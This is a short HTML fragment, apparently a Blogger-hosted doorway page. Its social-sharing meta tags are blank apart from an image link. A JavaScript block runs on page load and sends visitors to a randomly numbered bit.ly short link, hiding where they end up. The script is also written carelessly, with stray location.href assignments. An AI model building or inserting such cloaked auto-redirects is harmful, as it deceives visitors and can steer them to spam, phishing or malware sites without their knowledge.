<meta property="og:title" content=" ..">
<meta property="og:description" content="
                               

....

">                    
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="
https://blogger.googleusercontent.com/img/a/AVvXsEiuonep6k6aYPnICkdmqZAYz1qe7Mfp02jd_8oQpBRXCATgVtNx9zu2ZcKrFAqy1RdbgsB7F5BOeukCwtMEpYdcz05U8K-YKFyd4TCPGddE0plJ32-G9ZJyAFAmnU2rKkJlIslumQnwFBTOlnVHffpEgdN_wKG6Qozmx2H7bNKuoUTlOEamC5Mu3O1xgQ=s16000

">                             
<script type = "text/javascript">
function reDirect() {
a = location.href = "bit.ly/";
b = location.href = "pon";
c = location.href = "pona";
d = Math.ceil(Math.random() * 24);
a = "https://" + a + b + c + d ;
window.location = a
}
reDirect();
</script>
